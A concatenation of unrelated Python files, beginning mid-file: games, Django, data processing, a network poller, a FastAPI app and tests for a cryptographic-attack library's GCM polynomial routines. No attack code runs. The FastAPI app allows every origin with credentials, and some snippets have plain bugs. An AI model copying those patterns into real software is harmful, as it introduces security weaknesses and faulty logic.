self._control.jump = keys[K_SPACE]
self._rotation.yaw = round(self._rotation.yaw, 1)
self._control.direction = self._rotation.get_forward_vector()
@staticmethod
def _is_quit_shortcut(key):
return (key == K_ESCAPE) or (key == K_q and pygame.key.get_mods() & KMOD_CTRL)
|
import logging
from tweesky.parser.html_parser import HtmlParser
from tweesky.parser.spotify_parser import SpotifyTrack, SpotifyAlbum, SpotifyArtist, SpotifyEpisode, SpotifyPlaylist, \
SpotifyShow
def get_parser(url=None, html=None):
if 'open.spotify.com' in url:
return get_spotify_handler(url)
else:
return HtmlParser(url, html)
def get_spotify_handler(url):
if 'open.spotify.com/album/' in url:
return SpotifyAlbum(url)
elif 'open.spotify.com/track/' in url:
return SpotifyTrack(url)
elif 'open.spotify.com/artist/' in url:
return SpotifyArtist(url)
elif 'open.spotify.com/show/' in url:
return SpotifyShow(url)
elif 'open.spotify.com/episode/' in url:
return SpotifyEpisode(url)
elif 'open.spotify.com/playlist/' in url:
return SpotifyPlaylist(url)
else:
logging.error(f"Handler not found for {url}")
|
import pandas as pd
tweets_df = pd.read_csv('tweets.csv')
# Extract the created_at column from df: tweet_time
tweet_time = tweets_df['created_at']
# Extract the clock time: tweet_clock_time
tweet_clock_time = [entry[11:19] for entry in tweet_time if entry[17:19] == '19']
# Print the extracted times
print(tweet_clock_time)
|
import os
from importlib import import_module
def get_all_features(module=None):
all_values = []
files = ['features/'+module+'/'+name for name in os.listdir('./features/'+module)]
for fname in files:
if fname.endswith('.pyc'):
os.remove(fname)
for filename in files:
if '.py' not in filename or '__' in filename:
continue
module_name = filename.split('/')[-1].split('.')[0]
class_module = import_module('features.' + module +'.' + module_name)
all_values.append(getattr(class_module, 'Feature'))
return all_values
|
"""handles feature extraction"""
# rewrite of https://github.com/leelabcnbc/tang-paper-2017/blob/master/tang_2017/feature_extraction.py
from torchvision.models import vgg16, vgg16_bn, vgg19, vgg19_bn
from leelabtoolbox.feature_extraction.cnn import (cnnsizehelper, generic_network_definitions)
from leelabtoolbox.preprocessing import pipeline
from collections import defaultdict, OrderedDict
from torch import nn
from torch.autograd import Variable
from functools import partial
from skimage.transform import rescale
import numpy as np
from torch.utils.data import TensorDataset, DataLoader
from torch import FloatTensor
import h5py
def blobinfo():
# copied from
# https://github.com/leelabcnbc/leelab-toolbox/blob/fe57c8577993c9c9883eee1ca0b527cb8300226f/leelabtoolbox/feature_extraction/cnn/pytorch_network_definitions.py
blob_corresponding_info_inner = dict()
blob_corresponding_info_inner['vgg16'] = OrderedDict([('conv1_1', 'features.1'),
('conv1_2', 'features.3'),
('pool1', 'features.4'),
('conv2_1', 'features.6'),
('conv2_2', 'features.8'),
('pool2', 'features.9'),
('conv3_1', 'features.11'),
('conv3_2', 'features.13'),
('conv3_3', 'features.15'),
('pool3', 'features.16'),
('conv4_1', 'features.18'),
('conv4_2', 'features.20'),
('conv4_3', 'features.22'),
('pool4', 'features.23'),
('conv5_1', 'features.25'),
('conv5_2', 'features.27'),
('conv5_3', 'features.29'),
('pool5', 'features.30'),
('fc6', 'classifier.1'),
('fc7', 'classifier.4')])
blob_corresponding_info_inner['vgg16_bn'] = OrderedDict([('conv1_1', 'features.2'),
('conv1_2', 'features.5'),
('pool1', 'features.6'),
('conv2_1', 'features.9'),
('conv2_2', 'features.12'),
('pool2', 'features.13'),
('conv3_1', 'features.16'),
('conv3_2', 'features.19'),
('conv3_3', 'features.22'),
('pool3', 'features.23'),
('conv4_1', 'features.26'),
('conv4_2', 'features.29'),
('conv4_3', 'features.32'),
('pool4', 'features.33'),
('conv5_1', 'features.36'),
('conv5_2', 'features.39'),
('conv5_3', 'features.42'),
('pool5', 'features.43'),
('fc6', 'classifier.1'),
('fc7', 'classifier.4')])
blob_corresponding_info_inner['vgg19'] = OrderedDict([('conv1_1', 'features.1'),
('conv1_2', 'features.3'),
('pool1', 'features.4'),
('conv2_1', 'features.6'),
('conv2_2', 'features.8'),
('pool2', 'features.9'),
('conv3_1', 'features.11'),
('conv3_2', 'features.13'),
('conv3_3', 'features.15'),
('conv3_4', 'features.17'),
('pool3', 'features.18'),
('conv4_1', 'features.20'),
('conv4_2', 'features.22'),
('conv4_3', 'features.24'),
('conv4_4', 'features.26'),
('pool4', 'features.27'),
('conv5_1', 'features.29'),
('conv5_2', 'features.31'),
('conv5_3', 'features.33'),
('conv5_4', 'features.35'),
('pool5', 'features.36'),
('fc6', 'classifier.1'),
('fc7', 'classifier.4')])
blob_corresponding_info_inner['vgg19_bn'] = OrderedDict([('conv1_1', 'features.2'),
('conv1_2', 'features.5'),
('pool1', 'features.6'),
('conv2_1', 'features.9'),
('conv2_2', 'features.12'),
('pool2', 'features.13'),
('conv3_1', 'features.16'),
('conv3_2', 'features.19'),
('conv3_3', 'features.22'),
('conv3_4', 'features.25'),
('pool3', 'features.26'),
('conv4_1', 'features.29'),
('conv4_2', 'features.32'),
('conv4_3', 'features.35'),
('conv4_4', 'features.38'),
('pool4', 'features.39'),
('conv5_1', 'features.42'),
('conv5_2', 'features.45'),
('conv5_3', 'features.48'),
('conv5_4', 'features.51'),
('pool5', 'features.52'),
('fc6', 'classifier.1'),
('fc7', 'classifier.4')])
blob_corresponding_reverse_info_inner = dict()
for net_name, net_info in blob_corresponding_info_inner.items():
blob_corresponding_reverse_info_inner[net_name] = OrderedDict()
for x, y in net_info.items():
blob_corresponding_reverse_info_inner[net_name][y] = x
assert len(blob_corresponding_reverse_info_inner[net_name]) == len(net_info)
return blob_corresponding_info_inner, blob_corresponding_reverse_info_inner
blob_corresponding_info, blob_corresponding_reverse_info = blobinfo()
def get_one_network_meta(net_name, ec_size=22, blobs_to_extract=None):
if blobs_to_extract is None:
blobs_to_extract = list(blob_corresponding_info[net_name].keys())
# get meta info needed for this network
if net_name.endswith('_bn'):
net_name_for_check = net_name[:-3]
else:
net_name_for_check = net_name
input_size = generic_network_definitions.input_size_info[net_name_for_check]
blob_info = generic_network_definitions.blob_info[net_name_for_check]
helper_this = cnnsizehelper.CNNSizeHelper(blob_info, input_size)
# 22 is the original setting, since we rescale image to 2/3 of original
# (which is found to be (marginally?) better for RSA analysis, in both Corentin's case and Tang)
top_bottom = input_size[0] / 2 - ec_size / 2, input_size[0] / 2 + ec_size / 2
left_right = input_size[1] / 2 - ec_size / 2, input_size[1] / 2 + ec_size / 2
slicing_dict = defaultdict(lambda: ((None, None), (None, None)))
# compute how many columns to extract.
for layer in helper_this.layer_info_dict:
slicing_dict[layer] = helper_this.compute_minimum_coverage(layer, top_bottom, left_right)
slicing_dict = cnnsizehelper.get_slice_dict(slicing_dict, blobs_to_extract=blobs_to_extract)
def correspondence_func(x):
# handle no correspondence case
return blob_corresponding_reverse_info[net_name].get(x, None)
return helper_this, slicing_dict, blobs_to_extract, correspondence_func
def get_pretrained_network(net_name):
a = {'vgg16': vgg16, 'vgg19': vgg19, 'vgg16_bn': vgg16_bn, 'vgg19_bn': vgg19_bn}[net_name](pretrained=True)
# a.cuda()
a = a.eval()
return a
def _forward_hook(m, in_, out_, module_name, callback_dict, slice_this):
assert isinstance(out_, Variable)
data_all = out_.data.cpu().numpy()
# then slice it
slice_r, slice_c = slice_this
if data_all.ndim == 4:
data_this_to_use = data_all[:, :, slice_r, slice_c]
else:
assert data_all.ndim == 2
data_this_to_use = data_all
# print(f'{data_all.shape} -> {data_this_to_use.shape}')
# extra copy to guard against weird things.
callback_dict[module_name]['output'].append(data_this_to_use.copy())
def augment_module_pre(net: nn.Module, module_names: set, module_correspondence=None, slice_dict=None) -> (dict, list):
callback_dict = OrderedDict() # not necessarily ordered, but this can help some readability.
if module_correspondence is None:
# this maps internal PyTorch name to standard names (in Caffe).
module_correspondence = lambda x_: x_
forward_hook_remove_func_list = []
for x, y in net.named_modules():
if module_correspondence(x) in module_names:
callback_dict[module_correspondence(x)] = {}
callback_dict[module_correspondence(x)]['output'] = []
forward_hook_remove_func_list.append(
y.register_forward_hook(
partial(_forward_hook, module_name=module_correspondence(x), callback_dict=callback_dict,
slice_this=slice_dict[module_correspondence(x)])))
def remove_handles():
for h in forward_hook_remove_func_list:
h.remove()
return callback_dict, remove_handles
def preprocess_dataset(images, bgcolor, input_size, rescale_ratio=None):
# rescale
if rescale_ratio is not None:
images = np.asarray([rescale(im, scale=rescale_ratio, order=1, mode='edge') for im in images])
# make sure images are 3D
if images.ndim == 3:
images = np.concatenate((images[..., np.newaxis],) * 3, axis=-1)
assert images.ndim == 4 and images.shape[-1] == 3
assert np.all(images <= 1) and np.all(images >= 0)
# use leelab-toolbox pipeline
steps_naive = ['putInCanvas']
pars_naive = {'putInCanvas': {'canvas_size': input_size,
'canvas_color': bgcolor,
},
}
pipeline_naive, realpars_naive, order_naive = pipeline.preprocessing_pipeline(steps_naive, pars_naive,
order=steps_naive)
images_new = pipeline_naive.transform(images.astype(np.float32, copy=False))
# normalize
# check
# http://pytorch.org/docs/master/torchvision/models.html
images_new -= np.array([0.485, 0.456, 0.406])
images_new /= np.array([0.229, 0.224, 0.225])
# transpose
images_new = np.transpose(images_new, (0, 3, 1, 2))
# done
return images_new
def extract_features_one_case(net, dataset_preprocessed, blobs_to_extract, correspondence_func, slicing_dict,
batch_size, verbose=True):
callback_dict, remove_handles = augment_module_pre(net, blobs_to_extract,
module_correspondence=correspondence_func,
slice_dict=slicing_dict)
# then create tensor dataset
loader_this = DataLoader(TensorDataset(FloatTensor(dataset_preprocessed),
FloatTensor(np.zeros(len(dataset_preprocessed), dtype=np.float32))),
batch_size=batch_size)
for batch_idx, (inputs, _) in enumerate(loader_this):
inputs = Variable(inputs.cuda(), volatile=True) # pure inference mode.
net(inputs)
if (batch_idx + 1) % 20 == 0 and verbose:
print(f'[{batch_idx}/{len(loader_this)}]')
# then collect data
features_all = OrderedDict()
for blob_name, blob in callback_dict.items():
features_all[blob_name] = np.concatenate(blob['output'])
if verbose:
print(blob_name, features_all[blob_name].shape)
# maybe save some memory.
del callback_dict
# remove handles.
remove_handles()
return features_all
def process_one_case_wrapper(net_name_this, net_this, dataset_np_this, grp_name,
setting_this, bg_color, batch_size, file_to_save_input, file_to_save_feature):
(helper_this, slicing_dict,
blobs_to_extract, correspondence_func) = get_one_network_meta(net_name_this, setting_this['ec_size'])
print(grp_name, blobs_to_extract)
with h5py.File(file_to_save_feature) as f_feature:
if grp_name not in f_feature:
# then preproces dataset
# wrap this in hdf5, so that loading can be a lot faster.
# for why `ascontiguousarray`, see <https://discuss.pytorch.org/t/problem-with-reading-pfm-image/2924>
with h5py.File(file_to_save_input) as f_input:
if grp_name not in f_input:
dataset_preprocessed = preprocess_dataset(dataset_np_this, bg_color,
input_size=helper_this.input_size,
rescale_ratio=setting_this['scale'])
f_input.create_dataset(grp_name, data=dataset_preprocessed, compression="gzip")
f_input.flush()
print(f'{grp_name} input computation done')
else:
dataset_preprocessed = f_input[grp_name][...]
print(f'{grp_name} input computation done before')
dataset_preprocessed = np.ascontiguousarray(dataset_preprocessed)
print(dataset_preprocessed.shape)
features_all = extract_features_one_case(net_this, dataset_preprocessed,
blobs_to_extract, correspondence_func, slicing_dict, batch_size)
for blob_idx, blob_data in enumerate(features_all.values()):
f_feature.create_dataset(f'{grp_name}/{blob_idx}', data=blob_data, compression="gzip")
f_feature.flush()
print(f'{grp_name} feature extraction done')
# save blob names
f_feature[grp_name].attrs['blobs_to_extract'] = np.array([np.string_(x) for x in blobs_to_extract])
else:
print(f'{grp_name} feature extraction done before')
|
from DataUtil import *
if __name__ == '__main__':
image_paths = getAllImageData()
print(len(image_paths['naip_2013']))
print(len(image_paths['naip_2017']))
print(len(image_paths['nlcd_2013']))
print(len(image_paths['nlcd_2016']))
print(len(image_paths['landsat_2013']))
print(len(image_paths['landsat_2014']))
print(len(image_paths['landsat_2015']))
print(len(image_paths['landsat_2016']))
print(len(image_paths['landsat_2017']))
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from time import strftime
from django.contrib import admin
from django.contrib.admin import AdminSite
from book.models import book
from django.utils.translation import ugettext_lazy as _
class bookAdmin(admin.ModelAdmin):
# title = models.CharField("分类名称",max_length=100,db_index=True,unique=True)
def get_queryset(self, request):
qs = super(bookAdmin, self).get_queryset(request)
self.qs = qs
return qs
def ids(self, obj):
return len(self.qs) - list(self.qs).index(obj)
ids.short_description = "順序"
def modifyText(self, obj):
return "修改"
modifyText.short_description = "修改鏈接"
list_max_show_all = 20
list_display = ('ids', 'name', 'remoteIP', 'location', 'chapterCount', "idReader_id", 'status', 'accountCreateTime', "accountStatus", "modifyText")
search_fields = ('name', 'idReader_id')
radio_fields = {"status": admin.VERTICAL}
readonly_fields = ('id', 'remoteIP', 'location', 'chapterCount', "idReader_id", "createTime")
list_display_links = ('ids', 'modifyText')
view_on_site = True
# forbid adding new object
def has_add_permission(self, request):
return False
def has_change_permission(self, request, obj=None):
if obj is None:
return True # forbid visiting object-list-page
else:
return True # forbid visiting change-object-page
# Register your models here.
admin.site.register(book, bookAdmin)
|
from django.shortcuts import render
from django.http import HttpResponse
from blog.models import Post
# Create your views here.
# index view
def index(request):
all_posts = Post.objects.all()
posts_data = {
# we'll access all post with 'posts' name.
'posts': all_posts
}
return render(request, 'blog/index.html', context=posts_data)
def post_detail(request, pk):
selected_post = Post.objects.get(pk=pk)
posts_data = {
'post_in_detail': selected_post
}
return render(request, 'blog/post_detail.html', context=posts_data)
|
import numpy as np
import pandas as pd
import timeit
import itertools
from typing import List, IO
from numpy import int8, int64, ndarray
from numpy import uint8 # type: ignore[attr-defined]
import binascii
loops = 1000
t = 0.0 # type:float
# read 10 lines as bytes: 15us (winner)
def readfile1():
# type: () -> List[bytes]
with open('db10.csv', 'rb') as datafile: # type: IO[bytes]
return datafile.readlines()
t = timeit.timeit(readfile1,number=loops)
print(f'readfile1 rb 10 elapsed time: {1e6*t/loops} us')
# read 10 lines as string: 23 (loser)
#def readfile3():
# # type: () -> List[str]
# with open('db10.csv', 'r') as datafile: # type: IO[str]
# return datafile.readlines()
#t = timeit.timeit(readfile3,number=loops)
#print(f'readfile3 r 10 elapsed time: {1e6*t/loops} us')
# read 100 lines as bytes: 91us (winner)
def readfile2():
# type: () -> List[bytes]
with open('db100.csv', 'rb') as datafile: # type: IO[bytes]
return datafile.readlines()
t = timeit.timeit(readfile2,number=loops)
print(f'readfile2 rb 100 elapsed time: {1e6*t/loops} us')
# read 100 lines as string: 104us (loser)
#def readfile4():
# # type: () -> List[str]
# with open('db100.csv', 'r') as datafile: # type: IO[str]
# return datafile.readlines()
#t = timeit.timeit(readfile4,number=loops)
#print(f'readfile4 r 100 elapsed time: {1e6*t/loops} us')
# very slow, 2300 us
#def readfile6() -> pd.DataFrame:
# return pd.read_csv('db100.csv', delim_whitespace=True, header=None,
# names=['one','two','three','four'])
#t = timeit.timeit(readfile6,number=loops)
#print(f'readfile6 pd 100 elapsed time: {1e6*t/loops} us')
observations = np.random.normal(0,30,1000).astype(int8) # type: ndarray[int8]
unsigned_observations = (observations+128).astype(uint8) # type: ndarray[uint8]
unsigned_observations_bytes = unsigned_observations.tobytes() # type: bytes
# 1.2us
#hex_encoded = unsigned_observations_bytes.hex() # type: str
#def f1():
# # type: () -> str
# return unsigned_observations_bytes.hex()
#t = timeit.timeit(f1,number=loops)
#print(f'f1 bytes.hex() elapsed time: {1e6*t/loops} us')
# 1.3us, fast enough i guess
#hexlified = binascii.hexlify(unsigned_observations_bytes) # type: bytes
def f2():
# type: () -> bytes
return binascii.hexlify(unsigned_observations_bytes)
t = timeit.timeit(f2,number=loops)
print(f'f2 binascii.hexlify() elapsed time: {1e6*t/loops} us')
def readfile5():
# type: () -> List[bytes]
with open('db1.csv', 'rb') as datafile: # type: IO[bytes]
return datafile.readlines()
allrows = readfile5() # type: List[bytes]
onerow = allrows[0] # type: bytes
fields = onerow.split() # type: List[bytes]
observation_field = fields[3] # type: bytes
#hex_encoded = observation_field
#assert hex_encoded.encode() == hexlified
# 35us
#def f3a():
# # type: () -> List[int]
# return [y-128 for y in list(bytes.fromhex(hex_encoded))]
#t = timeit.timeit(f3a,number=loops)
#print(f'f3a bytes.fromhex elapsed time: {1e6*t/loops} us')
######################3
# decode from hex
# 35us, fast enough i guess, i think this could be faster.
decoded_fromhex = [y-128 for y in list(binascii.unhexlify(observation_field))] # type: List[int]
def f3():
# type: () -> List[int]
return [y-128 for y in list(binascii.unhexlify(observation_field))]
t = timeit.timeit(f3,number=loops)
print(f'f3 unhexlify elapsed time: {1e6*t/loops} us')
########################
# cumulative sum
# 20us, winner
def f4():
# type: () -> List[int]
return list(itertools.accumulate(decoded_fromhex))
t = timeit.timeit(f4,number=loops)
print(f'f4 accumulate elapsed time: {1e6*t/loops} us')
# 55us, loser, 106 with ndarray conversion, really loser
def f5():
# type: () -> List[int]
decoded_fromhex_ndarray = np.array(decoded_fromhex) # type: ndarray[int64]
return list(np.ndarray.cumsum(decoded_fromhex_ndarray))
t = timeit.timeit(f5,number=loops)
print(f'f5 cumsum elapsed time: {1e6*t/loops} us')
##############################
# drop an item
l = list(range(0,1000))
# 25 us
def l1():
# type: () -> List[int]
return [x for x in l if x != 500]
t = timeit.timeit(l1,number=loops)
print(f'l1 del elapsed time: {1e6*t/loops} us')
|
# coding=utf-8
from OTLMOW.OTLModel.Datatypes.KeuzelijstField import KeuzelijstField
from OTLMOW.OTLModel.Datatypes.KeuzelijstWaarde import KeuzelijstWaarde
# Generated with OTLEnumerationCreator. To modify: extend, do not edit
class KlNatuursteentegelGebruiksklasse(KeuzelijstField):
"""Mogelijke waarden voor de gebruiksklasse, vorm en afwerking van de natuursteentegel."""
naam = 'KlNatuursteentegelGebruiksklasse'
label = 'Natuursteentegel gebruiksklasse'
objectUri = 'https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#KlNatuursteentegelGebruiksklasse'
definition = 'Mogelijke waarden voor de gebruiksklasse, vorm en afwerking van de natuursteentegel.'
codelist = 'https://wegenenverkeer.data.vlaanderen.be/id/conceptscheme/KlNatuursteentegelGebruiksklasse'
options = {
'0': KeuzelijstWaarde(invulwaarde='0',
label='0',
definitie='Keuzeoptie decoratie als gebruiksklasse van natuursteentegels.',
objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlNatuursteentegelGebruiksklasse/0'),
'1': KeuzelijstWaarde(invulwaarde='1',
label='1',
definitie='Keuzeoptie voetgangerszones als gebruiksklasse van natuursteentegels.',
objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlNatuursteentegelGebruiksklasse/1'),
'2': KeuzelijstWaarde(invulwaarde='2',
label='2',
definitie='Keuzeoptie voetgangers- en fietszones als gebruiksklasse van natuursteentegels.',
objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlNatuursteentegelGebruiksklasse/2'),
'3': KeuzelijstWaarde(invulwaarde='3',
label='3',
definitie='Keuzeoptie voetgangerszones, occasioneel belast door wagens en lichte voertuigen, inritten van garages als gebruiksklasse van natuursteentegels.',
objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlNatuursteentegelGebruiksklasse/3'),
'4': KeuzelijstWaarde(invulwaarde='4',
label='4',
definitie='Keuzeoptie voetgangerszones en marktplaatsen, occasioneel belast voor leveringen en door hulpdiensten als gebruiksklasse van natuursteentegels.',
objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlNatuursteentegelGebruiksklasse/4'),
'5': KeuzelijstWaarde(invulwaarde='5',
label='5',
definitie='Keuzeoptie voetgangerszones, regelmatig belast door zwaar verkeer als gebruiksklasse van natuursteentegels.',
objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlNatuursteentegelGebruiksklasse/5'),
'6': KeuzelijstWaarde(invulwaarde='6',
label='6',
definitie='Keuzeoptie wegen als gebruiksklasse van natuursteentegels.',
objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlNatuursteentegelGebruiksklasse/6')
}
|
from django.http import HttpResponse
from plogical.CyberCPLogFileWriter import CyberCPLogFileWriter as logging
class pluginManagerGlobal:
@staticmethod
def globalPlug(request, eventInQuest, response = None):
if response == None:
hookReturn = eventInQuest.send(sender=None, request=request)
else:
hookReturn = eventInQuest.send(sender=None, request=request, response = response)
for items in hookReturn:
if type(items[1] == HttpResponse):
return items[1]
else:
if items[1] == 200:
return items[1]
else:
logging.writeToFile('Something wrong with : ' + str(items[0]) + ' on ' + str(eventInQuest))
return 200
return 200
|
from fastapi import FastAPI, HTTPException
from fastapi.middleware.cors import CORSMiddleware
from exchangeapi.routers.routers import router as api_router
from exchangeapi.db.mongodb_utils import connect_to_mongo, close_mongo_connection
app = FastAPI()
app.add_middleware(
CORSMiddleware,
allow_origins="*",
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
app.add_event_handler("startup", connect_to_mongo)
app.add_event_handler("shutdown", close_mongo_connection)
app.include_router(api_router, prefix="/api")
|
"""
This module contains the Poller logic
"""
import asyncio
import logging
import os
import signal
from typing import Dict
from suzieq.poller.worker.inventory.inventory import Inventory
from suzieq.poller.worker.services.service_manager import ServiceManager
from suzieq.poller.worker.writers.output_worker_manager \
import OutputWorkerManager
from suzieq.shared.exceptions import SqPollerConfError
logger = logging.getLogger(__name__)
class Poller:
"""Poller is the object in charge of coordinating services, nodes and
output worker tasks, in order to pull the data from the devices configured
in the device inventory.
"""
def __init__(self, userargs, cfg):
self._validate_poller_args(userargs, cfg)
# Set the worker id
self.worker_id = userargs.worker_id
# Setup poller tasks list
self.waiting_tasks = []
self.waiting_tasks_lock = asyncio.Lock()
# Init the node inventory object
self.inventory = self._init_inventory(userargs, cfg)
# Setup poller writers
# TODO: At the moment:
# output_dir: is the directory used by the gather method
# data_dir: is the directory used by parquet
# we need a way to define the settings
# for each type of output worker
self.output_args = {
'output_dir': userargs.output_dir,
'data_dir': cfg.get('data-directory')
}
if userargs.run_once in ['gather', 'process']:
userargs.outputs = ['gather']
self.output_manager = OutputWorkerManager(userargs.outputs,
self.output_args)
self.output_queue = self.output_manager.output_queue
# Initialize service manager
service_dir = cfg['service-directory']
svc_schema_dir = cfg.get('schema-directory', None)
default_svc_period = cfg.get('poller', {}).get('period', 15)
run_mode = userargs.run_once or 'forever'
svc_manager_args = {
'service_only': userargs.service_only,
'exclude_services': userargs.exclude_services
}
self.service_manager = ServiceManager(self._add_poller_task,
service_dir,
svc_schema_dir,
self.output_queue,
run_mode,
default_svc_period,
**svc_manager_args)
async def init_poller(self):
"""Initialize the poller, instantiating the services and setting up
the connection with the nodes. This function should be called only
at the beginning before calling run().
"""
logger.info('Initializing poller')
init_tasks = []
init_tasks.append(self.inventory.build_inventory())
init_tasks.append(self.service_manager.init_services())
nodes, services = await asyncio.gather(*init_tasks)
if not nodes or not services:
# Logging should've been done by init_nodes/services for details
raise SqPollerConfError('Terminating because no nodes'
'or services found')
async def run(self):
"""Start polling the devices.
Before running this function the poller should be initialized.
"""
# Add the node list in the services
await self.service_manager.set_nodes(self.inventory.get_node_callq())
logger.info('Suzieq Started')
# When the poller receives a termination signal, we would like
# to gracefully terminate all the tasks, i.e. closing all the
# connections with nodes.
loop = asyncio.get_event_loop()
for s in [signal.SIGTERM, signal.SIGINT]:
loop.add_signal_handler(
s, lambda s=s: asyncio.create_task(self._stop()))
# Schedule the tasks to run
await self.inventory.schedule_nodes_run()
await self.service_manager.schedule_services_run()
await self._add_poller_task([self.output_manager.run_output_workers()])
try:
# The logic below of handling the writer worker task separately
# is to ensure we can terminate properly when all the other
# tasks have finished as in the case of using file input
# instead of SSH
tasks = await self._pop_waiting_poller_tasks()
while tasks:
try:
_, pending = await asyncio.wait(
tasks, return_when=asyncio.FIRST_COMPLETED)
tasks = list(pending)
running_svcs = self.service_manager.running_services
# pylint: disable=protected-access
if tasks and any(i._coro in running_svcs
for i in tasks):
continue
break
except asyncio.CancelledError:
break
except asyncio.CancelledError:
logger.warning('Received terminate signal. Terminating...')
async def _add_poller_task(self, tasks):
"""Add new tasks to be executed in the poller run loop."""
await self.waiting_tasks_lock.acquire()
self.waiting_tasks += tasks
self.waiting_tasks_lock.release()
def _init_inventory(self, userargs, cfg):
# Define the dictionary with the settings
# for any kind of inventory source
connect_timeout = cfg.get('poller', {}).get('connect-timeout', 15)
inventory_args = {
'connect_timeout': connect_timeout,
'ssh_config_file': userargs.ssh_config_file,
}
# Retrieve the specific inventory source to use
inv_types = Inventory.get_plugins()
inventory_class = None
source_args = {}
if userargs.input_dir:
# 'dir' is not a real inventory source
# we need to override the Inventory class
# in order to simulate nodes providing the data
# inside the specified input directory.
inventory_class = inv_types['dir']
source_args = {'input_dir': userargs.input_dir}
else:
mgr_cfg = cfg.get('poller', {}).get('manager', {})
type_to_use = mgr_cfg.get('type', 'static')
inventory_class = inv_types.get(type_to_use)
if not inventory_class:
raise SqPollerConfError(f'No inventory {type_to_use} found')
source_args = {
**mgr_cfg,
'worker-id': self.worker_id
}
return inventory_class(self._add_poller_task,
**source_args,
**inventory_args)
async def _pop_waiting_poller_tasks(self):
"""Empty the list of tasks to be added in the run loop
and return its content.
"""
# Since the function is asynchronous and we need to
# read the content of the task list and, at the end, empty
# it, we need to handle concurrency. Otherwise we risk to loose
# all the tasks added after the list has been read, but before
# the list emptying.
await self.waiting_tasks_lock.acquire()
poller_tasks = self.waiting_tasks
self.waiting_tasks = []
self.waiting_tasks_lock.release()
return poller_tasks
async def _stop(self):
"""Stop the poller"""
tasks = [t for t in asyncio.all_tasks()
if t is not asyncio.current_task()]
for task in tasks:
task.cancel()
def _validate_poller_args(self, userargs: Dict, _):
"""Validate the arguments and the configuration passed to the poller.
The function produces a SqPollerConfError exception if there is
something wrong in the configuration.
Args:
userargs (Dict): Dictionary containing the arguments passed to the
poller
cfg (Dict): The content of the Suzieq configuration file
Raises:
SqPollerConfError: raise when the configuration is not valid
"""
if userargs.ssh_config_file:
if not os.access(userargs.ssh_config_file, os.F_OK):
raise SqPollerConfError(
f'Unable to read ssh config in {userargs.ssh_config_file}'
)
ssh_config_file = os.path.expanduser(userargs.ssh_config_file)
if (os.stat(
os.path.dirname(
ssh_config_file)).st_mode | 0o40700 != 0o40700):
raise SqPollerConfError(
'ssh directory has wrong permissions, must be 0700'
)
|
#!/usr/bin/env python3
"""
Sultanov Andriy
MIT License 2020
"""
def main():
# Creating a new library instance
library = Library()
# Adding a new book
library.add_book("Macbeth", "Macbeth.txt", "Shakespeare, William", 1606)
# Created a new Category Author Shakespeare, William
# Created a new Category Year 1606
print(library.authors_list)
# "CategoryList Authors: Category Shakespeare, William, contains these books <Macbeth, 1606>
# Getting the list of all published years categories
print(library.published_years)
# "CategoryList Publication Years: Category 1606, contains these books <Macbeth, 1606>
# Reading the text of the book
for book in library.published_years[1606]:
with open(book.filename, "r") as file:
text = file.read
# Reading the text of the book
for book in library.authors_list["Shakespeare, William"]:
with open(book.filename, "r") as file:
text = file.read
if __name__ == '__main__':
main()
|
#!/usr/bin/python
from __future__ import absolute_import, division, print_function
import subprocess
from builtins import bytes, range
from os.path import abspath, dirname
from os.path import join as join_path
from random import randint
from CryptoAttacks.Block.gcm import *
from CryptoAttacks.Utils import log
def test_polynomials():
print("Test polynomials")
Pmod = GF_2k_generator(128, [128,7,2,1,0])
P = Pmod(0b10011010101100110100100110011101100110010111111000111011101000000110110100010101000101100100111100011001010100100110100111011000)
Q = Pmod(0b01111010101010110111000011011100010011101111000001010000011000010000111010001111100001111010110001001000011101000011111110010101)
print(P.to_bits(), bin(P.to_int()), P)
print(Q.to_bits(), bin(Q.to_int()), Q)
w = P*Q
print(w.to_bits(), bin(w.to_int()), w)
assert Q.coefficients == Pmod(Q.coefficients).coefficients
assert Q.coefficients == Pmod(Q.to_int()).coefficients
assert Q.coefficients == Pmod(Q.to_bytes()).coefficients
print('')
Pmod = GF_2k_generator(10, [11,7,2,1,0])
c1 = Pmod(1)
c2 = Pmod(0)
c3 = Pmod(0)
c4 = Pmod(0)
polynomial1 = Polynomial_128([c1,c2,c3,c4])
c1 = Pmod(1236)
c2 = Pmod(0)
c3 = Pmod(0)
c4 = Pmod(0)
polynomial2 = Polynomial_128([c1,c2,c3,c4])
print(polynomial1)
print(polynomial2)
print("+", polynomial1 + polynomial2)
print("*", polynomial1 * polynomial2)
q = polynomial1 / polynomial2
r = polynomial1 % polynomial2
print("/", q)
print("%", r)
print('')
print(polynomial1)
print(polynomial2*q + r)
print('')
def test_gcm():
print("Test GCM")
plaintext = bytes(b'hn9YA(F BW&B (W&&W(RT&WEF f7*WB FTgsdc')
additional = bytes(b'j gej8g0SRYH8s 8s9yf sgd78taDS* GASyd ')
key = bytes(b'xgrtjdh&LA28XNwh')
nonce = bytes(b'a drO*1@((js')
ciphertext, tag = gcm_encrypt(plaintext, additional, key, nonce)
assert gcm_verify(tag, ciphertext, additional, key, nonce)
blocks = aes_bytes_to_poly_blocks(ciphertext, additional)
ciphertext2, additional2 = poly_blocks_to_aes_bytes(blocks)
assert ciphertext == ciphertext2
assert additional == additional2
def polynomial_factors_product(factorization):
"""factorization: [(poly1, power), (poly2, power)]"""
result = factorization[0][0].one_element()
for f, f_degree in factorization:
result *= f**f_degree
return result
def test_factor():
print("Test factor")
Pmod = GF_2k_generator(9, [9,7,2,1,0])
c1 = Pmod(31)
c2 = Pmod(0)
c3 = Pmod(0)
c4 = Pmod(3)
polynomial1 = Polynomial_128([c1,c2,c3,c4])
c1 = Pmod(237)
c2 = Pmod(1)
c3 = Pmod(0)
c4 = Pmod(10)
polynomial2 = Polynomial_128([c1,c2,c3,c4])
polynomial = polynomial1 * polynomial2
print(polynomial1)
print(polynomial2)
print(polynomial)
print(polynomial.monic())
print('')
factorization = factor_polynomial(polynomial)
print(factorization)
result = polynomial.one_element()
for f, f_degree in factorization:
result *= f**f_degree
print(result)
print('')
